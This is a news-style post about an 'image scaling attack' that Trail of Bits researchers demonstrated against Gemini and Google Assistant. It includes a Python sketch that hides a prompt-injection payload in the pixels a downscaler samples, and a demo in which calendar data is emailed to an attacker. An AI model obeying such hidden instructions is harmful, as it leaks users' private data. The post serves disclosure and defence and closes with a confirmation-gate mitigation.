Hidden Commands in Images Exploit AI Chatbots and Steal Data

A newly discovered vulnerability in AI systems could allow hackers to steal private information by hiding commands in ordinary images. Cybersecurity researchers at Trail of Bits found a way to trick AI models by exploiting a common preprocessing feature, image downscaling, in a technique they have named an “image scaling attack.”

AI models often automatically reduce the size of large images before processing them. This is where the vulnerability lies. The researchers found a way to create high-resolution images that appear normal to the human eye but contain hidden instructions that become visible only when the image is shrunk by the AI. This “invisible” text, a type of prompt injection, can then be read and executed by the AI without the user’s knowledge.
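To make the mechanism concrete, here is a minimal, self-contained Python sketch. It assumes a toy preprocessing pipeline that downscales by plain stride (nearest-neighbor) sampling with a hypothetical factor of 8; the actual research targets the bicubic and bilinear resampling used by real image libraries, which requires far more careful pixel optimization, but the principle is the same: only the pixels the downscaler samples need to carry the payload.

```python
import numpy as np

SCALE = 8  # hypothetical downscaling factor used by the toy pipeline


def embed(cover: np.ndarray, payload: np.ndarray) -> np.ndarray:
    """Write `payload` into only the pixels the downscaler will sample."""
    out = cover.copy()
    out[::SCALE, ::SCALE] = payload  # only 1 in 64 pixels changes
    return out


def downscale(img: np.ndarray) -> np.ndarray:
    """Toy preprocessing step: nearest-neighbor downscale by striding."""
    return img[::SCALE, ::SCALE]


rng = np.random.default_rng(0)
# Benign-looking cover image: near-white noise, 512x512 grayscale.
cover = rng.integers(235, 255, size=(512, 512), dtype=np.uint8)

# Payload drawn at the *downscaled* resolution (64x64). The dark band
# stands in for rendered instruction text an attacker would embed.
payload = np.full((64, 64), 245, dtype=np.uint8)
payload[28:36, 8:56] = 0

stego = embed(cover, payload)

# At full resolution, only ~1.5% of pixels differ from the cover...
changed = np.count_nonzero(stego != cover)
print(f"modified {changed} of {stego.size} pixels")

# ...but after the pipeline's downscale, the payload reassembles exactly.
assert np.array_equal(downscale(stego), payload)
```

Trail of Bits released a tool, Anamorpher, for crafting such images against real resampling algorithms; the sketch above only illustrates the underlying idea.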

The researchers demonstrated the attack’s effectiveness on several AI systems, including Google’s Gemini CLI, Gemini’s web interface, and Google Assistant. In one instance, they showed how a malicious image could trigger the AI to access a user’s Google Calendar and email the details to an attacker, all without any confirmation from the user.
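One mitigation this demonstration points to is requiring explicit user confirmation before an agent executes sensitive tool calls, no matter where the instruction originated. The sketch below is a hypothetical guard; the tool names and the `guarded_tool_call` wrapper are illustrative and not part of any real agent framework's API.

```python
# Hypothetical guard: tool names and wrapper are illustrative only.
SENSITIVE_TOOLS = {"read_calendar", "send_email"}


def guarded_tool_call(tool_name: str, args: dict) -> bool:
    """Ask the user before running tools that can read or exfiltrate data.

    The confirmation happens out-of-band from the model, so instructions
    smuggled in via an image cannot approve themselves.
    """
    if tool_name in SENSITIVE_TOOLS:
        answer = input(f"Agent wants to call {tool_name}({args}). Allow? [y/N] ")
        if answer.strip().lower() != "y":
            print(f"blocked: {tool_name}")
            return False
    print(f"executing: {tool_name}")
    return True


# The calendar-exfiltration chain from the demo would now stall at two
# explicit prompts instead of running silently.
guarded_tool_call("read_calendar", {"range": "next_7_days"})
guarded_tool_call("send_email", {"to": "attacker@example.com"})
```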

To read the complete article, see: Hidden Commands in Images Exploit AI Chatbots and Steal Data

This post is licensed under CC BY 4.0 by the author.